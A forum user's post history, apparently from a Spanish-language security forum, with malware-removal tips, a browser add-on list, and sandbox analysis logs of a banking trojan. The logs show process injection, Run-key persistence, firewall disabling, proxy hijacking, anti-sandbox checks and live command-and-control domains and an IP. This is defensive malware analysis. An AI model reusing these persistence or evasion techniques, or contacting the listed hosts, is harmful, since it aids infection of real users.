Show Posts
871  Operating Systems / GNU/Linux / Re: Problems with the repository?? on: 20 February 2013, 00:33 am
Take a look at this topic:
http://bfwiki.tellefsen.net/index.php/Installing_Bluefish

Did you try the command without the asterisks?
Code:
yum list bluefish

Regards.
872  Computer Security / Security / Re: How to remove the Recycler.bin virus? on: 20 February 2013, 00:18 am
If that doesn't work for you, with Gmer you can view and delete those files; it's an anti-rootkit (File tab).
It would also be advisable to delete the system restore points, since some copy themselves to that folder.

Gmer: http://www.gmer.net/
Direct download: http://www2.gmer.net/gmer.zip

Regards.
873  Computer Security / Security / Re: Beware of the ONO email offering free ADSL!! on: 20 February 2013, 00:09 am
Thanks for the warning, I've sent you a PM.

Regards.
874  Computer Security / Security / Plugins for browsers (FF, IE, O, M, CD, S) on: 20 February 2013, 00:03 am
Updated list of add-ons for browsers:

Firefox: https://addons.mozilla.org/es/firefox/

Download Firefox: http://www.mozilla.org/es-ES/firefox/fx/

NoScript: https://addons.mozilla.org/es/firefox/addon/noscript/?src=cb-dl-mostpopular
Wot: https://addons.mozilla.org/es/firefox/addon/wot-safe-browsing-tool/?src=cb-dl-mostpopular
Adblock Plus: https://addons.mozilla.org/es/firefox/addon/adblock-plus/?src=cb-dl-mostpopular
AdblockPlus Pop-upAddon: https://addons.mozilla.org/es/firefox/addon/adblock-plus-pop-up-addon/?src=cb-dl-mostpopular
Ghostery: https://addons.mozilla.org/es/firefox/addon/ghostery/?src=cb-dl-mostpopular
Better Privacy: https://addons.mozilla.org/es/firefox/addon/betterprivacy/?src=cb-dl-mostpopular
NOGoogleAnalytics: https://addons.mozilla.org/es/firefox/addon/no-google-analytics/?src=cb-dl-recentlyadded
DuckDuckGo Search: https://addons.mozilla.org/es/firefox/addon/duckduckgo-for-firefox/?src=cb-dl-featured

** If you install many plugins in Firefox it can consume a lot of memory; installing MemoryFox is recommended:
MemoryFox: https://addons.mozilla.org/es/firefox/addon/memory-fox/


Internet Explorer: http://www.iegallery.com/PinnedSites

Download Internet Explorer: http://ie9.discoverbing.com/intl/es-xl/index.html

Dr.Web LinkChecker: http://www.freedrweb.com/linkchecker/internet+explorer/
Wot: http://www.mywot.com/es/download/ie
McAfee Site Advisor: https://sadownload.mcafee.com/products/SA/Website/saSetup.exe
G-Data Cloud Security: https://www.gdata.de/?eID=PushFile&dl=deea11a7a2%3AAFIGDQY%3D


Google Chrome: https://chrome.google.com/webstore/

Download Google Chrome:

Adblock Plus: https://chrome.google.com/webstore/detail/adblock-plus/cfhdojbkjhnklbpkdaibdccddilifddb?hl=es
DuckDuckGo: https://chrome.google.com/webstore/detail/duckduckgo-for-chrome/bpphkkgodbfncbcpgopijlfakfgmclao?hl=es
Wot: https://chrome.google.com/webstore/detail/wot/bhmmomiinigofkjcapegjjndpbikblnp?hl=es
GeoProxy: https://chrome.google.com/webstore/detail/geoproxy/pooljnboifbodgifngpppfklhifechoe?hl=es
Click&Clean: https://chrome.google.com/webstore/detail/clickclean/ghgabhipcejejjmhhchfonmamedcbeod?hl=es
DoNotTrackMe: https://chrome.google.com/webstore/detail/donottrackme/epanfjkfahimkgomnigadpkobaefekcd?hl=es
Webmail AdBlocker: https://chrome.google.com/webstore/detail/webmail-ad-blocker/cbhfdchmklhpcngcgjmpdbjakdggkkjp?hl=es
Webutation: https://chrome.google.com/webstore/detail/webutation/nfclfmabiojpommfcalfdgjjeaahnjbj?hl=es
MetaSurf: https://chrome.google.com/webstore/detail/metasurf/dpfbddcgbimoafpgmbbjiliegkfcjkmn?hl=es
Dr.WebAnti-Virus Link Checker: https://chrome.google.com/webstore/detail/drweb-anti-virus-link-che/aleggpabliehgbeagmfhnodcijcmbonb?hl=es
HideMyAss! WebProxy: https://chrome.google.com/webstore/detail/hide-my-ass-web-proxy/cmgnmcnlncejehjlnhaglpnoolgbflbd?hl=es
Bitdefender QuickScan: https://chrome.google.com/webstore/detail/bitdefender-quickscan/pdnkcidphdcakpkheohlhocaicfamjie?hl=es
javascript PopupBlocker: https://chrome.google.com/webstore/detail/javascript-popup-blocker/hiajdlfgbgnnjakkbnpdhmhfhklkbiol?hl=es
FoxyProxy Standard: https://chrome.google.com/webstore/detail/foxy-proxy-standard/gcknhkkoolaabfmlnjonogaaifnjlfnp?hl=es
Traffic Light: https://chrome.google.com/webstore/detail/trafficlight/cfnpidifppmenkapgihekkeednfoenal?hl=es
Qualys BrowserCheck: https://chrome.google.com/webstore/detail/qualys-browsercheck/ejhnkognlohdkpjkjongioociddgoibk?hl=es
SafeGmail: https://chrome.google.com/webstore/detail/safegmail/lmjkmpdndmbieflefonjgnnfimmkbedf?hl=es
SurfPatrol: https://chrome.google.com/webstore/detail/surfpatrol/jkppgpkggbadgdkdjephjfpmblapdcpb?utm_source=chrome%20-ntp-icon


Opera: https://addons.opera.com/es/

Download Opera: http://www.opera.com/download/

Adblock Plus: https://addons.opera.com/es/extensions/details/opera-adblock/?display=en
Wot: https://addons.opera.com/es/extensions/details/wot/?display=es
Dr.Web Link Checker: https://addons.opera.com/es/extensions/details/drweb-link-checker-2/?display=es
Ghostery: https://addons.opera.com/es/extensions/details/ghostery/?display=en
NotScripts: https://addons.opera.com/es/extensions/details/notscripts/?display=en
NoAds: https://addons.opera.com/es/extensions/details/noads/?display=en
NoAds Advanced: https://addons.opera.com/es/extensions/details/noads-advanced/?display=es
DuckDuckGo: https://addons.opera.com/es/extensions/details/duckduckgo-for-opera-2/?display=en


Safari:

Download Safari: http://support.apple.com/kb/DL1531?viewlocale=es_ES

Wot: http://www.mywot.com/files/downloads/wot-20100712.safariextz
javascript Blocker: http://dl.dropbox.com/u/11967/JS%20Blocker.safariextz
AdBlock Plus: http://safariadblock.com/AdBlockForSafari.safariextz
Dr. Web Link Checker: http://download.geo.drweb.com/pub/drweb/linkchecker/Safari/2.0/safari.linkchecker.safariextz
Traffic Light: http://download.bitdefender.com/npd/trafficlight/extensions/safari/TrafficLight.safariextz
Ghostery: http://www.ghostery.com/safari/Ghostery.safariextz
Incognito: http://www.orbicule.com/incognito/Incognito.safariextz
Cookie stumbler: http://www.writeitstudios.com/extensions/Cookie%20Stumbler.safariextz


Maxthon:
http://extension.maxthon.com/

Download Maxthon: http://es.maxthon.com/



Comodo Dragon: https://chrome.google.com/webstore/category/extensions

Download Comodo Dragon: http://www.comodo.com/dragon/intl/en-GB/browserchoice/index.html?track=1870

It works with the same plugins as Chrome, although the browsers are different.
Dragon includes two security modules: Comodo Share Page Service and Comodo Web Inspector.


** Under construction; if you have more add-ons to add for any browser, comment in this topic.

Regards.

Updated: 20.02.2013
875  Computer Security / Security / Re: tyoyanos on: 17 February 2013, 13:49 pm
Hi OmarHack, thanks for the comments; please try not to upload programs that include cracks or similar. As far as I'm concerned, as long as the program is clean there's no problem, but those are the forum rules.

Regards.
876  Computer Security / Security / Re: tyoyanos on: 17 February 2013, 12:36 pm
Hi, boot the PC in "Safe Mode" and disable the system restore points.

Start - Control Panel - System:
Go to the "System Restore" tab and untick the option: Turn off System Restore on all drives.

All system restore points will be deleted, so now run a deep scan with Malwarebytes and your antivirus; once it removes it, it can no longer be restored.

Delete temporary, usage and browsing files with CCleaner, for example, then reboot and report the results; if it didn't work we'll look for another alternative.

Regards.
877  Computer Security / Security / Re: Check the last time the files on the external hard drive could have been viewed on: 16 February 2013, 15:15 pm
I think that without a disk comparison made with some program, you can only check the files' Properties and see the last access or modification dates, as you mentioned. If it falls within the date range in which it was "stolen", you'll know whether they accessed it.

Tell him there are programs that encrypt files or disks (in the case of confidential info); in that case it would have been almost impossible for him to access it.

Regards.
878  Computer Security / Malware Analysis and Design / Re: Banking Trojan II (different configuration). on: 16 February 2013, 14:53 pm
The log continues...
Code:
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\windows\system32\drwtsn32.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\dwwin.exe) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\msv1_0.dll) [c:\windows\system32\dwwin.exe]
OpenProcessToken(C:\WINDOWS\system32\drwtsn32.exe) [c:\windows\system32\drwtsn32.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\windows\system32\drwtsn32.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\windows\system32\drwtsn32.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\windows\system32\drwtsn32.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(LPK.DLL) [c:\windows\system32\drwtsn32.exe]
OpenProcess(drwtsn32.exe) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(USER32) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(imm32.dll) [c:\windows\system32\drwtsn32.exe]
CreateEvent(Global\userenv:  User Profile setup event) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\windows\system32\drwtsn32.exe]
ResumeThread() [c:\windows\system32\drwtsn32.exe]
LoadLibrary(ntdll.dll) [c:\windows\system32\drwtsn32.exe]
CreateEvent(DbgEngEvent_00000550) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(rpcrt4.dll) [c:\windows\system32\drwtsn32.exe]
GetComputerName() [c:\windows\system32\drwtsn32.exe]
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED) [c:\windows\system32\drwtsn32.exe]
OpenProcess(HxD.exe) [c:\windows\system32\drwtsn32.exe]
VirtualAllocEx(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe,MEM_RESERVE,PAGE_READWRITE) [c:\windows\system32\drwtsn32.exe]
VirtualAllocEx(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe,MEM_COMMIT,PAGE_READWRITE) [c:\windows\system32\drwtsn32.exe]
WriteProcessMemory(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe) [c:\windows\system32\drwtsn32.exe]
CreateFile(C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\drwtsn32.log) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\kernel32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(c:\windows\system32\exts.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(c:\windows\system32\ntsdexts.dll) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(ntdll.dll) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1848) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1900) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1836) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1832) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1676) [c:\windows\system32\drwtsn32.exe]
Sleep(0) [c:\windows\system32\drwtsn32.exe]
GetUserName() [c:\windows\system32\drwtsn32.exe]
LoadLibrary(secur32.dll) [c:\windows\system32\drwtsn32.exe]
QuerySystemInformation() [c:\windows\system32\drwtsn32.exe]
OpenProcess(System) [c:\windows\system32\drwtsn32.exe]
OpenProcess(smss.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\smss.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(csrss.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(winlogon.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\winlogon.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(services.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\services.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(lsass.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\lsass.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(VBoxService.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\vboxservice.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(svchost.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\svchost.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(SbieSvc.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\sandboxie\sbiesvc.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(explorer.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\explorer.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(VBoxTray.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\vboxtray.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(ctfmon.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\ctfmon.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(alg.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(XueTr.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\documents and settings\r32\mis documentos\tools\xuetr\xuetr.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(u1210.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\documents and settings\r32\mis documentos\tools\red\u1210.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(iexplore.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\internet explorer\iexplore.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(firefox.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\mozilla firefox\firefox.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(BSA.EXE) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\documents and settings\r32\mis documentos\descargas\bsa\bsa.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(sniff_hit.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\idefense\map\sniff_hit.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(wireshark.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\wireshark\wireshark.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(dumpcap.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\wireshark\dumpcap.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(SbieCtrl.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\sandboxie\sbiectrl.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(procexp.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\documents and settings\r32\mis documentos\tools\procexp.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(wmiprvse.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(SandboxieRpcSs.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\sandboxie\sandboxierpcss.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(SandboxieDcomLaunch.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\sandboxie\sandboxiedcomlaunch.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(winsa64.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\drwtsn32.exe) [c:\windows\system32\drwtsn32.exe]
TerminateProcess(à?¤\dee\harskvol1\do) [c:\windows\system32\drwtsn32.exe]
CreateFile(C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\user.dmp) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(psapi.dll) [c:\windows\system32\drwtsn32.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPALL,964) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1648) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1644) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1640) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1636) [c:\windows\system32\drwtsn32.exe]
FreeLibrary() [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\ntdll.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\USER32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\GDI32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\IMM32.DLL) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\RPCRT4.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\Secur32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\OLEAUT32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\msvcrt.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\ole32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\VERSION.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\SHLWAPI.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\SHELL32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\WINMM.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\UxTheme.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\psapi.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\MSACM32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\DBGHELP.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\exts.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\ntsdexts.dll) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(mscoree.dll) [c:\windows\system32\drwtsn32.exe]
ExitProcess(0) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(EXPLORER.EXE) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(C:\WINDOWS\system32\Msctf.dll) [c:\windows\winsa64.exe]
Code:
Report generated with Buster Sandbox Analyzer 1.85 at 12:31:20 on 08/02/2013

 [ General information ]
   * File name: c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe

 [ Changes to filesystem ]
   * Creates file C:\WINDOWS\winsa64.cfg
   * Creates file C:\WINDOWS\winsa64.exe
   * Creates file C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\drwtsn32.log
   * Creates file C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\user.dmp
   * Modifies file C:\Documents and Settings\r32\Configuración local\Archivos temporales de Internet\Content.IE5\index.dat
   * Modifies file C:\Documents and Settings\r32\Configuración local\Historial\History.IE5\index.dat
   * Modifies file C:\Documents and Settings\r32\Cookies\index.dat

 [ Changes to registry ]
   * Modifies value "NumberOfCrashes=00000003" in key HKEY_LOCAL_MACHINE\software\microsoft\DrWatson
          old value "NumberOfCrashes=00000002"
   * Modifies value "NukeOnDelete=00000001" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket
          old value empty
   * Creates value "DisableNotifications=00000001" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile
   * Creates value "DisableNotifications=00000001" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile
   * Modifies value "DisableNotifications=00000001" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
          old value empty
   * Empties value "EnableFirewall" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
         old value "EnableFirewall=00000001"
   * Modifies value "ProxyEnable=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings
          old value empty
   * Creates value "ProxyServer=3100320037002E0030002E0030002E0031003A0039003600360036000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings
                    binary data=127.0.0.1:9666
   * Modifies value "ProxyOverride=3100320037002E0030002E0030002E0031000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings
                       binary data=127.0.0.1
          old value "ProxyOverride=6C006F00630061006C000000"
                       binary data=local
   * Creates Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013020720130208
   * Creates Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013020820130209
   * Modifies value "SavedLegacySettings=46000000B9010000030000000E0000003132372E302E302E313A39363636090000003132372E302E302E3100000000040000000000000050EB206AFBFACD01010000000A00020F000000000000000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
          old value "SavedLegacySettings=46000000BA0100000100000000000000050000006C6F63616C00000000040000000000000050EB206AFBFACD01010000000A00020F000000000000000000000000"
   * Creates value "winsa64=43003A005C00570049004E0044004F00570053005C00770069006E0073006100360034002E006500780065000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Run
                binary data=C:\WINDOWS\winsa64.exe

 [ Network services ]
   * Looks for an Internet connection.
   * Queries DNS "www.cadastramento.net".
   * Queries DNS "www.chabvf.info".
   * Queries DNS "www.yoeqtxutb.info".
   * Queries DNS "www.itjdcryfa.info".
   * Queries DNS "solutionfinder.microsoft.com".
   * Queries DNS "s3.amazonaws.com".
   * Queries DNS "google.es".
   * Queries DNS "www3.nationalgeographic.com".
   * Queries DNS "google.bg".
   * Queries DNS "google.net".
   * Queries DNS "google.co.uk".
   * Queries DNS "google.kz".
   * Queries DNS "google.pt".
   * Queries DNS "google.by".
   * C:\WINDOWS\winsa64.exe Connects to "212.1.208.24" on port 80 (TCP - HTTP).
   * Downloads file from "www.cadastramento.net/sistema.html".

 [ Process/window/string information ]
   * Enables process privileges.
   * Gets user name information.
   * Gets system default language ID.
   * Gets computer name.
   * Checks for debuggers.
   * Creates a mutex "CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Anti-Malware Analyzer routine: WinDbg detection.
   * Anti-Malware Analyzer routine: Sandboxie detection.
   * Creates an event named "ShellCopyEngineRunning".
   * Creates an event named "ShellCopyEngineFinished".
   * Creates a mutex "INSONIA".
   * Creates a mutex "HxD{73025671-91B6-473C-B0EE-6EAB6FD0E6DE}".
   * Creates a mutex "MSCTF.Shared.MUTEX.EBH".
   * Opens a service named "AudioSrv".
   * Creates a mutex "MidiMapper_modLongMessage_RefCnt".
   * Creates a mutex "MidiMapper_Configure".
   * Enumerates running processes.
   * Creates process "(null),C:\WINDOWS\system32\dwwin.exe -x -s 456,C:\WINDOWS\system32".
   * Injects code into process "c:\windows\system32\dwwin.exe".
   * Creates a mutex "SHIMLIB_LOG_MUTEX".
   * Creates a mutex "Local\_!MSFTHISTORY!_".
   * Creates a mutex "Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!".
   * Creates a mutex "Local\c:!documents and settings!r32!cookies!".
   * Creates a mutex "Local\c:!documents and settings!r32!configuración local!historial!history.ie5!".
   * Creates a mutex "RasPbFile".
   * Lists all entry names in a remote access phone book.
   * Opens a service named "RASMAN".
   * Opens a service named "Sens".
   * Injects code into process "c:\windows\system32\drwtsn32.exe".
   * Creates an event named "DbgEngEvent_00000550".
   * Injects code into process "c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe".
   * Terminates process "à?¤\dee\harskvol1\do".
   * Contains string Anubis detection routine found ("76487-337-8429955-22614")
   * Contains string Sandboxie detection routine found ("SbieDll.dll")
Extracting information from my system:

Code:
Report generated with Buster Sandbox Analyzer 1.85 at 12:31:20 on 08/02/2013

Detailed report of suspicious malware actions:

Anubis detection routine found
Checked for debuggers
Created a mutex named: CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: HxD{73025671-91B6-473C-B0EE-6EAB6FD0E6DE}
Created a mutex named: INSONIA
Created a mutex named: Local\_!MSFTHISTORY!_
Created a mutex named: Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!
Created a mutex named: Local\c:!documents and settings!r32!configuración local!historial!history.ie5!
Created a mutex named: Local\c:!documents and settings!r32!cookies!
Created a mutex named: MidiMapper_Configure
Created a mutex named: MidiMapper_modLongMessage_RefCnt
Created a mutex named: MSCTF.Shared.MUTEX.EBH
Created a mutex named: RasPbFile
Created a mutex named: SHIMLIB_LOG_MUTEX
Created file in defined folder: C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\drwtsn32.log
Created file in defined folder: C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\user.dmp
Created process: (null),C:\WINDOWS\system32\dwwin.exe -x -s 456,C:\WINDOWS\system32
Defined file type created in Windows folder: C:\WINDOWS\winsa64.exe
Defined registry AutoStart location created or modified: machine\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\DisableNotifications = 00000001
Defined registry AutoStart location created or modified: machine\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\DisableNotifications = 00000001
Defined registry AutoStart location created or modified: machine\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = 00000001
Defined registry AutoStart location created or modified: user\current\software\Microsoft\Windows\CurrentVersion\Run\winsa64 = 43003A005C00570049004E0044004F00570053005C00770069006E0073006100360034002E006500780065000000
File copied itself
Firewall settings change: machine\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\enablefirewall = empty value key
Got computer name
Got system default language ID
Got user name information
Internet connection: C:\WINDOWS\winsa64.exe Connects to "212.1.208.24" on port 80 (TCP - HTTP)
Listed all entry names in a remote access phone book
Modified file in defined folder: C:\Documents and Settings\r32\Configuración local\Archivos temporales de Internet\Content.IE5\index.dat
Modified file in defined folder: C:\Documents and Settings\r32\Configuración local\Historial\History.IE5\index.dat
Modified file in defined folder: C:\Documents and Settings\r32\Cookies\index.dat
Queried DNS: google.bg
Queried DNS: google.by
Queried DNS: google.co.uk
Queried DNS: google.es
Queried DNS: google.kz
Queried DNS: google.net
Queried DNS: google.pt
Queried DNS: s3.amazonaws.com
Queried DNS: solutionfinder.microsoft.com
Queried DNS: www.cadastramento.net
Queried DNS: www.chabvf.info
Queried DNS: www.itjdcryfa.info
Queried DNS: www.yoeqtxutb.info
Queried DNS: www3.nationalgeographic.com
Sandboxie detection routine found
Terminated process: à?¤\dee\harskvol1\do
Transfered files from and/or to internet

   * Creates an event named "ShellCopyEngineRunning".
   * Creates an event named "ShellCopyEngineFinished".
   * Creates a mutex "INSONIA".
   * Creates a mutex "HxD{73025671-91B6-473C-B0EE-6EAB6FD0E6DE}".
   * Creates a mutex "MSCTF.Shared.MUTEX.EBH".
   * Opens a service named "AudioSrv".
   * Creates a mutex "MidiMapper_modLongMessage_RefCnt".
   * Creates a mutex "MidiMapper_Configure".
   * Enumerates running processes.
   * Creates process "(null),C:\WINDOWS\system32\dwwin.exe -x -s 456,C:\WINDOWS\system32".
   * Injects code into process "c:\windows\system32\dwwin.exe".
   * Creates a mutex "SHIMLIB_LOG_MUTEX".
   * Creates a mutex "Local\_!MSFTHISTORY!_".
   * Creates a mutex "Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!".
   * Creates a mutex "Local\c:!documents and settings!r32!cookies!".
   * Creates a mutex "Local\c:!documents and settings!r32!configuración local!historial!history.ie5!".
